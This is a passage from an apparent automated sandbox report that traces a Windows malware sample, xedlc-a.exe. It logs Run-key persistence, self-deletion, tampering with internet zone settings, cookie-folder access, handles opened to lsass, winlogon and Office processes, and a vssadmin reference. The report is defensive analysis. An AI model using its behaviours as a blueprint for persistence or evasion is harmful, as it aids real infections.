44230.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\4090949DDCD5A0A4\"data" = 31 4b 79 36 32 77 6f 4e 44 74 64 36 55 63 67 74 34 64 62 50 44 79 47 44 51 6b 77 5a 78 74 47 36 57 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 8b 89 21 a0 72 ed 08 a9 e0 fc ec 34 58 d6 4c d4 91 83 df 1c 45 da 83 70 39 8e 65 08 6c 49 3b cf eb ea 58 fe db 5b 88 c0 84 2b 42 94 01 e6 5f 1e b3 3f 34 40 74 e6 3d ce 20 51 e9 89 74 65 d4 9f 00 00 37 41 37 34 35 36 42 31 31 39 38 46 32 36 43 44 32 43 41 46 39 33 37 45 31 34 34 38 33 41 34 33 41 36 44 35 39 30 31 35 35 37 45 39 43 34 45 35 32 39 42 38 32 33 35 39 39 30 37 38 44 44 35 39 33 34 36 31 33 30 37 30 33 43 32 45 39 37 46 41 44 41 32 46 44 41 46 42 34 39 42 32 45 37 32 38 42 37 39 39 46 45 41 30 35 36 39 34 39 42 43 43 35 42 32 42 42 30 36 42 31 33 31 39 42 44 41 46 00 00 00 00 04 54 e8 cb 98 dc 40 63 37 1d b8 b7 d4 c6 bb ba 94 d4 ce 42 d2 52 aa 69 40 fa 7e a9 9f cb 24 14 3e bf df f3 19 a6 4b bc a2 5f a3 7b 50 5!
44231.  4 db 41 5f c1 cf 09 b0 ec 1d 15 29 15 aa 68 ed 3c 5d ed d8 00 00 00 00 00 00 00 00 71 79 62 56 00 00 00 00
44232.           processinfo:
44233.             pid: 1056
44234.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44235.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44236.         regkey:
44237.           timestamp: 56714
44238.           mode: added
44239.           sequenceNumber: 393
44240.           value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
44241.           processinfo:
44242.             pid: 1056
44243.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44244.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44245.         regkey:
44246.           timestamp: 56719
44247.           mode: setval
44248.           sequenceNumber: 394
44249.           value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLinkedConnections" = 0x00000001
44250.          processinfo:
44251.            pid: 1056
44252.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44254.        malicious-alert:
44255.          classtype: misc-anom
44256.          weight: 100
44257.          ruleid: 10068 : Process deleting itself ;  Process deleting itself in any manor
44258.          msg: Process deleting itself in any manor
44259.          display-msg: Process deleting itself
44260.        regkey:
44261.          timestamp: 56867
44262.          mode: added
44263.          sequenceNumber: 395
44264.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run
44265.          processinfo:
44266.            pid: 1056
44267.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44268.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44269.        regkey:
44270.          timestamp: 56871
44271.          mode: setval
44272.          sequenceNumber: 396
44273.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run\"Acronis"\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Internet Files
44274.          processinfo:
44275.            pid: 1056
44276.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44277.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44278.        mutex:
44279.          timestamp: 57540
44280.          sequenceNumber: 473
44281.          value: \BaseNamedObjects\ZonesCounterMutex
44282.          processinfo:
44283.            pid: 1056
44284.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44286.        mutex:
44287.          timestamp: 57540
44288.          sequenceNumber: 474
44289.          value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
44290.          processinfo:
44291.            pid: 1056
44292.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44293.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44294.        mutex:
44295.          timestamp: 57540
44296.          sequenceNumber: 475
44297.          value: \BaseNamedObjects\ZonesCacheCounterMutex
44298.          processinfo:
44299.            pid: 1056
44300.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44301.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44302.        regkey:
44303.          timestamp: 57540
44304.          mode: setval
44305.          sequenceNumber: 476
44306.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
44307.           processinfo:
44308.             pid: 1056
44309.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44310.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44311.         regkey:
44312.           timestamp: 57540
44313.           mode: setval
44314.           sequenceNumber: 477
44315.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
44316.          processinfo:
44317.            pid: 1056
44318.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44319.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44320.        regkey:
44321.          timestamp: 57540
44322.          mode: setval
44323.          sequenceNumber: 478
44324.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
44325.           processinfo:
44326.             pid: 1056
44327.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44328.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44329.         regkey:
44330.           timestamp: 57540
44331.           mode: setval
44332.           sequenceNumber: 479
44333.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
44334.          processinfo:
44335.            pid: 1056
44336.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44338.        mutex:
44339.          timestamp: 57540
44340.          sequenceNumber: 480
44341.          value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
44342.          processinfo:
44343.            pid: 1056
44344.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44346.        mutex:
44347.          timestamp: 57563
44348.          sequenceNumber: 481
44349.          value: \BaseNamedObjects\ZonesLockedCacheCounterMutex
44350.          processinfo:
44351.            pid: 1056
44352.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44353.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44354.        regkey:
44355.          timestamp: 57563
44356.          mode: setval
44357.          sequenceNumber: 482
44358.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
44359.           processinfo:
44360.             pid: 1056
44361.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44362.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44363.         regkey:
44364.           timestamp: 57563
44365.           mode: setval
44366.           sequenceNumber: 483
44367.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
44368.          processinfo:
44369.            pid: 1056
44370.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44371.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44372.        regkey:
44373.          timestamp: 57563
44374.          mode: setval
44375.          sequenceNumber: 484
44376.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
44377.           processinfo:
44378.             pid: 1056
44379.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44380.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44381.         regkey:
44382.           timestamp: 57563
44383.           mode: setval
44384.           sequenceNumber: 485
44385.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
44386.          processinfo:
44387.            pid: 1056
44388.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44389.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44390.        folder:
44391.          timestamp: 57610
44392.          mode: open
44393.          sequenceNumber: 486
44394.          value: C:\Documents and Settings\admin\Cookies
44395.          processinfo:
44396.            pid: 1056
44397.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44398.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44399.          ntstatus: 0x0
44400.          CreateOptions: 0x200000
44401.        regkey:
44402.          timestamp: 57564
44403.          mode: added
44404.          sequenceNumber: 487
44405.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
44406.          processinfo:
44407.            pid: 1056
44408.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44409.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44410.        regkey:
44411.          timestamp: 57564
44412.          mode: setval
44413.          sequenceNumber: 488
44414.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cookies"\"ComputerName"
44415.          processinfo:
44416.            pid: 1056
44417.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44418.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44419.        process:
44420.          timestamp: 57828
44421.          mode: opened
44422.          sequenceNumber: 528
44423.          desiredaccess: 0x02000030
44424.          ntstatus: 0x00000000
44425.          target:
44426.            processinfo:
44427.              pid: 4
44428.              imagepath: System
44429.          source:
44430.            processinfo:
44431.              pid: 1056
44432.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44433.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44434.        process:
44435.          timestamp: 57832
44436.          mode: opened
44437.          sequenceNumber: 529
44438.          desiredaccess: 0x02000030
44439.          ntstatus: 0x00000000
44440.          target:
44441.            processinfo:
44442.              pid: 316
44443.              imagepath: C:\WINDOWS\system32\smss.exe
44444.              md5sum: 5f816c1f539266d2d4c78694239da0b5
44445.          source:
44446.            processinfo:
44447.              pid: 1056
44448.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44449.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44450.        process:
44451.          timestamp: 57838
44452.          mode: opened
44453.          sequenceNumber: 530
44454.          desiredaccess: 0x02000030
44455.          ntstatus: 0x00000000
44456.          target:
44457.            processinfo:
44458.              pid: 420
44459.              imagepath: C:\WINDOWS\system32\csrss.exe
44460.              md5sum: 44f275c64738ea2056e3d9580c23b60f
44461.          source:
44462.            processinfo:
44463.              pid: 1056
44464.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44465.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44466.        process:
44467.          timestamp: 57843
44468.          mode: opened
44469.          sequenceNumber: 531
44470.          desiredaccess: 0x02000030
44471.          ntstatus: 0x00000000
44472.          target:
44473.            processinfo:
44474.              pid: 444
44475.              imagepath: C:\WINDOWS\system32\winlogon.exe
44476.              md5sum: ed0ef0a136dec83df69f04118870003e
44477.          source:
44478.            processinfo:
44479.              pid: 1056
44480.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44481.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44482.        process:
44483.          timestamp: 57848
44484.          mode: opened
44485.          sequenceNumber: 532
44486.          desiredaccess: 0x02000030
44487.          ntstatus: 0x00000000
44488.          target:
44489.            processinfo:
44490.              pid: 552
44491.              imagepath: C:\WINDOWS\system32\services.exe
44492.              md5sum: 0e776ed5f7cc9f94299e70461b7b8185
44493.          source:
44494.            processinfo:
44495.              pid: 1056
44496.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44497.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44498.        process:
44499.          timestamp: 57853
44500.          mode: opened
44501.          sequenceNumber: 533
44502.          desiredaccess: 0x02000030
44503.          ntstatus: 0x00000000
44504.          target:
44505.            processinfo:
44506.              pid: 564
44507.              imagepath: C:\WINDOWS\system32\lsass.exe
44508.              md5sum: bf2466b3e18e970d8a976fb95fc1ca85
44509.          source:
44510.            processinfo:
44511.              pid: 1056
44512.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44513.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44514.        process:
44515.          timestamp: 57859
44516.          mode: opened
44517.          sequenceNumber: 534
44518.          desiredaccess: 0x02000030
44519.          ntstatus: 0x00000000
44520.          target:
44521.            processinfo:
44522.              pid: 716
44523.              imagepath: C:\WINDOWS\system32\svchost.exe
44524.              md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
44525.          source:
44526.            processinfo:
44527.              pid: 1056
44528.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44529.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44530.        process:
44531.          timestamp: 57864
44532.          mode: opened
44533.          sequenceNumber: 535
44534.          desiredaccess: 0x02000030
44535.          ntstatus: 0x00000000
44536.          target:
44537.            processinfo:
44538.              pid: 776
44539.              imagepath: C:\WINDOWS\system32\svchost.exe
44540.              md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
44541.          source:
44542.            processinfo:
44543.              pid: 1056
44544.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44545.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44546.        process:
44547.          timestamp: 57869
44548.          mode: opened
44549.          sequenceNumber: 536
44550.          desiredaccess: 0x02000030
44551.          ntstatus: 0x00000000
44552.          target:
44553.            processinfo:
44554.              pid: 840
44555.              imagepath: C:\WINDOWS\system32\svchost.exe
44556.              md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
44557.          source:
44558.            processinfo:
44559.              pid: 1056
44560.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44561.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44562.        process:
44563.          timestamp: 57873
44564.          mode: opened
44565.          sequenceNumber: 537
44566.          desiredaccess: 0x02000030
44567.          ntstatus: 0x00000000
44568.          target:
44569.            processinfo:
44570.              pid: 892
44571.              imagepath: C:\WINDOWS\system32\svchost.exe
44572.              md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
44573.          source:
44574.            processinfo:
44575.              pid: 1056
44576.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44577.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44578.        process:
44579.          timestamp: 57878
44580.          mode: opened
44581.          sequenceNumber: 538
44582.          desiredaccess: 0x02000030
44583.          ntstatus: 0x00000000
44584.          target:
44585.            processinfo:
44586.              pid: 1164
44587.              imagepath: C:\WINDOWS\system32\spoolsv.exe
44588.              md5sum: d8e14a61acc1d4a6cd0d38aebac7fa3b
44589.          source:
44590.            processinfo:
44591.              pid: 1056
44592.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44593.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44594.        process:
44595.          timestamp: 57884
44596.          mode: opened
44597.          sequenceNumber: 539
44598.          desiredaccess: 0x02000030
44599.          ntstatus: 0x00000000
44600.          target:
44601.            processinfo:
44602.              pid: 1800
44603.              imagepath: C:\WINDOWS\system32\alg.exe
44604.              md5sum: 8c515081584a38aa007909cd02020b3d
44605.          source:
44606.            processinfo:
44607.              pid: 1056
44608.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44609.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44610.        process:
44611.          timestamp: 57889
44612.          mode: opened
44613.          sequenceNumber: 540
44614.          desiredaccess: 0x02000030
44615.          ntstatus: 0x00000000
44616.          target:
44617.            processinfo:
44618.              pid: 1864
44619.              imagepath: C:\WINDOWS\system32\wscntfy.exe
44620.              md5sum: f92e1076c42fcd6db3d72d8cfe9816d5
44621.          source:
44622.            processinfo:
44623.              pid: 1056
44624.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44625.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44626.        process:
44627.          timestamp: 57894
44628.          mode: opened
44629.          sequenceNumber: 541
44630.          desiredaccess: 0x02000030
44631.          ntstatus: 0x00000000
44632.          target:
44633.            processinfo:
44634.              pid: 1900
44635.              imagepath: C:\Program Files\Messenger\msmsgs.exe
44636.              md5sum: 3e930c641079443d4de036167a69caa2
44637.          source:
44638.            processinfo:
44639.              pid: 1056
44640.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44641.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44642.        process:
44643.          timestamp: 57898
44644.          mode: opened
44645.          sequenceNumber: 542
44646.          desiredaccess: 0x02000030
44647.          ntstatus: 0x00000000
44648.          target:
44649.            processinfo:
44650.              pid: 1924
44651.              imagepath: C:\WINDOWS\system32\ctfmon.exe
44652.              md5sum: 5f1d5f88303d4a4dbc8e5f97ba967cc3
44653.          source:
44654.            processinfo:
44655.              pid: 1056
44656.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44657.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44658.        process:
44659.          timestamp: 57903
44660.          mode: opened
44661.          sequenceNumber: 543
44662.          desiredaccess: 0x02000030
44663.          ntstatus: 0x00000000
44664.          target:
44665.            processinfo:
44666.              pid: 2684
44667.              imagepath: C:\WINDOWS\explorer.exe
44668.              md5sum: 12896823fb95bfb3dc9b46bcaedc9923
44669.          source:
44670.            processinfo:
44671.              pid: 1056
44672.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44673.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44674.        process:
44675.          timestamp: 57911
44676.          mode: opened
44677.          sequenceNumber: 544
44678.          desiredaccess: 0x02000030
44679.          ntstatus: 0x00000000
44680.          target:
44681.            processinfo:
44682.              pid: 2768
44683.              imagepath: C:\Program Files\Internet Explorer\iexplore.exe
44684.              md5sum: b60dddd2d63ce41cb8c487fcfbb6419e
44685.          source:
44686.            processinfo:
44687.              pid: 1056
44688.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44689.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44690.        process:
44691.          timestamp: 57916
44692.          mode: opened
44693.          sequenceNumber: 545
44694.          desiredaccess: 0x02000030
44695.          ntstatus: 0x00000000
44696.          target:
44697.            processinfo:
44698.              pid: 3048
44699.              imagepath: C:\Program Files\Internet Explorer\iexplore.exe
44700.              md5sum: b60dddd2d63ce41cb8c487fcfbb6419e
44701.          source:
44702.            processinfo:
44703.              pid: 1056
44704.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44705.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44706.        process:
44707.          timestamp: 57921
44708.          mode: opened
44709.          sequenceNumber: 546
44710.          desiredaccess: 0x02000030
44711.          ntstatus: 0x00000000
44712.          target:
44713.            processinfo:
44714.              pid: 3132
44715.              imagepath: C:\Program Files\Internet Explorer7\iexplore.exe
44716.              md5sum: de49b348a18369b4626fba1d49b07fb4
44717.          source:
44718.            processinfo:
44719.              pid: 1056
44720.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44721.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44722.        process:
44723.          timestamp: 57925
44724.          mode: opened
44725.          sequenceNumber: 547
44726.          desiredaccess: 0x02000030
44727.          ntstatus: 0x00000000
44728.          target:
44729.            processinfo:
44730.              pid: 3184
44731.              imagepath: C:\Program Files\Internet Explorer6\IEXPLORE.EXE
44732.              md5sum: e7484514c0464642be7b4dc2689354c8
44733.          source:
44734.            processinfo:
44735.              pid: 1056
44736.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44737.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44738.        process:
44739.          timestamp: 57931
44740.          mode: opened
44741.          sequenceNumber: 548
44742.          desiredaccess: 0x02000030
44743.          ntstatus: 0x00000000
44744.          target:
44745.            processinfo:
44746.              pid: 3496
44747.              imagepath: C:\Program Files\Office\OFFICE11\WINWORD.EXE
44748.              md5sum: 7a0fa3a0282b4630f3768a74441d4bae
44749.          source:
44750.            processinfo:
44751.              pid: 1056
44752.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44753.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44754.        process:
44755.          timestamp: 57936
44756.          mode: opened
44757.          sequenceNumber: 549
44758.          desiredaccess: 0x02000030
44759.          ntstatus: 0x00000000
44760.          target:
44761.            processinfo:
44762.              pid: 3684
44763.              imagepath: C:\Program Files\Office\OFFICE11\EXCEL.EXE
44764.              md5sum: a2557e5e3d8474b5fa2abafe8e025e4e
44765.          source:
44766.            processinfo:
44767.              pid: 1056
44768.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44769.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44770.        process:
44771.          timestamp: 57941
44772.          mode: opened
44773.          sequenceNumber: 550
44774.          desiredaccess: 0x02000030
44775.          ntstatus: 0x00000000
44776.          target:
44777.            processinfo:
44778.              pid: 3852
44779.              imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
44780.              md5sum: 443747857245bf90847ae396c53470a6
44781.          source:
44782.            processinfo:
44783.              pid: 1056
44784.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44785.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44786.        process:
44787.          timestamp: 57946
44788.          mode: opened
44789.          sequenceNumber: 551
44790.          desiredaccess: 0x02000030
44791.          ntstatus: 0x00000000
44792.          target:
44793.            processinfo:
44794.              pid: 3872
44795.              imagepath: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE
44796.              md5sum: 49a38000d31452a9faf0d8d1774634f6
44797.          source:
44798.            processinfo:
44799.              pid: 1056
44800.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44801.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44802.        process:
44803.          timestamp: 57954
44804.          mode: opened
44805.          sequenceNumber: 552
44806.          desiredaccess: 0x02000030
44807.          ntstatus: 0x00000000
44808.          target:
44809.            processinfo:
44810.              pid: 3912
44811.              imagepath: C:\Program Files\MSOffice\OFFICE11\WINWORD.EXE
44812.              md5sum: 1eea7dd2f1ea6efef380b99a90228d2f
44813.          source:
44814.            processinfo:
44815.              pid: 1056
44816.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44817.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44818.        process:
44819.          timestamp: 57959
44820.          mode: opened
44821.          sequenceNumber: 553
44822.          desiredaccess: 0x02000030
44823.          ntstatus: 0x00000000
44824.          target:
44825.            processinfo:
44826.              pid: 4068
44827.              imagepath: C:\Program Files\MSOffice\OFFICE11\EXCEL.EXE
44828.              md5sum: bbcc5d4e09d7fd9454910261e6dc0725
44829.          source:
44830.            processinfo:
44831.              pid: 1056
44832.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44833.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44834.        process:
44835.          timestamp: 57963
44836.          mode: opened
44837.          sequenceNumber: 554
44838.          desiredaccess: 0x02000030
44839.          ntstatus: 0x00000000
44840.          target:
44841.            processinfo:
44842.              pid: 2008
44843.              imagepath: C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
44844.              md5sum: f13f5ac8b89c9ac8d02d1ef7cf9bdf0a
44845.          source:
44846.            processinfo:
44847.              pid: 1056
44848.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44849.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44850.        process:
44851.          timestamp: 57969
44852.          mode: opened
44853.          sequenceNumber: 555
44854.          desiredaccess: 0x02000030
44855.          ntstatus: 0x00000000
44856.          target:
44857.            processinfo:
44858.              pid: 140
44859.              imagepath: C:\Program Files\Microsoft Office\Office12\EXCEL.EXE
44860.              md5sum: 0187bdafbafaf967bb91b4f2d8e33bc8
44861.          source:
44862.            processinfo:
44863.              pid: 1056
44864.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44865.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44866.        process:
44867.          timestamp: 57974
44868.          mode: opened
44869.          sequenceNumber: 556
44870.          desiredaccess: 0x02000030
44871.          ntstatus: 0x00000000
44872.          target:
44873.            processinfo:
44874.              pid: 164
44875.              imagepath: C:\Program Files\Microsoft Office\Office12\POWERPNT.EXE
44876.              md5sum: dc53ba349c9284775893b5377e860f2e
44877.          source:
44878.            processinfo:
44879.              pid: 1056
44880.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44881.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44882.        process:
44883.          timestamp: 57981
44884.          mode: opened
44885.          sequenceNumber: 557
44886.          desiredaccess: 0x02000030
44887.          ntstatus: 0x00000000
44888.          target:
44889.            processinfo:
44890.              pid: 952
44891.              imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe
44892.              md5sum: 0ffae66e6d5b1c87cbd22d1f3b6079fd
44893.          source:
44894.            processinfo:
44895.              pid: 1056
44896.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44897.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44898.        regkey:
44899.          timestamp: 57909
44900.          mode: added
44901.          sequenceNumber: 558
44902.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
44903.          processinfo:
44904.            pid: 1056
44905.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44906.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44907.        regkey:
44908.          timestamp: 57909
44909.          mode: setval
44910.          sequenceNumber: 559
44911.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"History" = C:\Documents and Settings\admin\Local Settings\History
44912.           processinfo:
44913.             pid: 1056
44914.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44915.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44916.         regkey:
44917.           timestamp: 57909
44918.           mode: setval
44919.           sequenceNumber: 560
44920.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
44921.          processinfo:
44922.            pid: 1056
44923.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44925.        regkey:
44926.          timestamp: 57909
44927.          mode: setval
44928.          sequenceNumber: 561
44929.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass"\"C:\WINDOWS\system32\vssadmin.exe" = Command Line Interface for Microsoft. Volume Shadow Copy Service
44930.          processinfo:
44931.            pid: 1056
44932.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44933.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44934.        file:
44935.          timestamp: 61781
44936.          mode: failed
44937.          sequenceNumber: 601
44938.          value: C:\Documents and Settings\admin\Application Data\RASAPI32.dll
44939.          processinfo:
44940.            tainted: true
44941.            pid: 1056
44942.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44943.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44944.            ads:
44945.          fid (ads:): 0
44946.          failure: open
44947.          ntstatus: 0xc0000034
44948.          CreateOptions: 0x200000
44949.          PE:
44950.            InspectionType: Ext
44951.        file:
44952.          timestamp: 61789
44953.          mode: failed
44954.          sequenceNumber: 602
44955.          value: C:\Documents and Settings\admin\Application Data\rasman.dll
44956.          processinfo:
44957.            tainted: true
44958.            pid: 1056
44959.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44960.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44961.            ads:
44962.          fid (ads:): 0
44963.          failure: open
44964.          ntstatus: 0xc0000034
44965.          CreateOptions: 0x200000
44966.          PE:
44967.            InspectionType: Ext
44968.        file:
44969.          timestamp: 61852
44970.          mode: failed
44971.          sequenceNumber: 603
44972.          value: C:\Documents and Settings\admin\Application Data\TAPI32.dll
